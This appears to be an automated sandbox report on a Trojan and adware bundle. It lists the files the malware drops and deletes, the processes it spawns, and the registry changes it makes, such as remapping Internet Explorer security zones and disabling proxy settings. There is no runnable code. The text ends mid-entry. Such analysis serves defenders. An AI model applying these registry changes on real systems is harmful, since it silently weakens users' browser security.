%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe (20504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_a9[1].exe (32816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe (32816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp (3526 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\310714_is.exe (44832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].php (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\240714_ps[1].exe (33816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\291014_nj[1].exe (110758 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_mb[1] (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe (64392 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\s9[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].htm (0 bytes)
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_light.png (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\min.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code2.jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code3.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\one.zip (127551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code5.jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\unchecked.png (135 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\uninstallDlg2.xml (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe (76650 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\UninstallManager.exe (60186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\DataBase (26688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\Thumbs.db (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bk_shadow.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\close.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code4.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button1.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowser.exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg1.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\Thumbs.db (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\1[1].zip (229748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\scrollbar.bmp (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FBFDE863-3C17-4B82-A5D1-9B8ED5BE6B40.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checked.png (222 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\RegWrite.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_bg.png (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox.png (545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code6.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\2[1].zip (325830 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox_select.png (783 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\479.json (512 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\conf (79 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code1.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg.png (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\two.zip (255743 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\MessageBox.xml (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowserFrame.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\479.db (208 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_light.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\min.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code2.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code3.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\one.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code5.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\unchecked.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\uninstallDlg2.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowser.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\VMwareXVirtualXIDEXHardXDrive_00000000000000000001[1].finish,9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\UninstallManager.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bk_shadow.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\close.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code4.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button1.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\Thumbs.db (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg1.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\Thumbs.db (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\scrollbar.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checked.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_bg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code6.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\VMwareXVirtualXIDEXHardXDrive_00000000000000000001[1].2008&update4=nation,us&update5=language,en (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox_select.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\conf (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code1.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\two.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\MessageBox.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowserFrame.dll (0 bytes)
The process CashReminder.exe:1232 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\CashReminder\mfs1A.tmp (408297 bytes)
%WinDir%\Temp\P_RuleList.txt (265 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\stores[1].htm (687 bytes)
%WinDir%\Temp\P_StoreList.txt (687 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\rules[1].txt (265 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\P_StoreList.txt (0 bytes)
%WinDir%\Temp\P_RuleList.txt (0 bytes)
The process GOSafer.exe:2604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\G_CheckUpdate.txt (8 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\rules[2].txt (16 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\update[1].htm (8 bytes)
%WinDir%\Temp\G_RuleList.txt (16 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\G_CheckUpdate.txt (0 bytes)
%WinDir%\Temp\G_RuleList.txt (0 bytes)
The process WNet.exe:2284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\rules[1].txt (94 bytes)
%WinDir%\Temp\P_RuleList.txt (94 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\P_RuleList.txt (0 bytes)
The process 310714_is.exe:1880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-5M11A.tmp\310714_is.tmp (57 bytes)
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe:1180 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\awhC.tmp (171 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awhD.tmp (149648 bytes)
Registry activity
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe:392 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 0B 73 68 19 D4 B8 20 54 0C 39 E9 0E 94 8F 7F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ActSys]
"DisplayName" = "ActSys"
"QuietUninstallString" = "%Program Files%\ActSys\remove_ActSys.exe /S"
"UninstallString" = "%Program Files%\ActSys\remove_ActSys.exe /S"
"Publisher" = "NINJASOFT LLC"
[HKLM\SOFTWARE\ActSys]
"Version" = "1.2.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ActSys]
"Comments" = "Browse safe online with our product! It alerts you if a page is harmful for your computer (Build ID: wTPAs0BV5vwXnsqTRKHr9acfe)"
"DisplayVersion" = "1.2.0"
The process net1.exe:976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 FC 87 E8 80 A2 55 7D AA 1A 8C 10 15 12 EE C2"
The process net1.exe:2596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 74 19 E5 13 50 24 54 9A 40 6B 6D DC A1 84 7D"
The process net1.exe:2220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 2E BE 5A C2 09 9D 92 F4 C5 CA 9C B2 8E DB 30"
The process net1.exe:2588 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 8C FF 26 57 BD 1B F4 D2 AB BE 49 AB 1F 7F C8"
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe:1196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 42 7D A0 57 47 2B B7 FE 76 DE E4 3A 31 67 CE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 310714_is.tmp:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB 6A 3E 23 7C F3 73 72 CF 72 AC 59 12 BB 7F 79"
The process q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe:1316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B CC C6 55 8D 18 2D B0 27 A2 5D EC 73 67 A1 01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ProtectService.exe:3496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 96 CC 61 6D 7A 19 DE 6D 6B E8 FC 68 F4 93 2A"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 07 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process ProtectService.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 23 63 9C A3 6A 5E 1F 4E 66 23 2C 78 39 B7 EC"
The process ProtectService.exe:3468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 29 46 DA F9 47 D1 BE D9 26 DF 69 E6 7D 1A 96"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
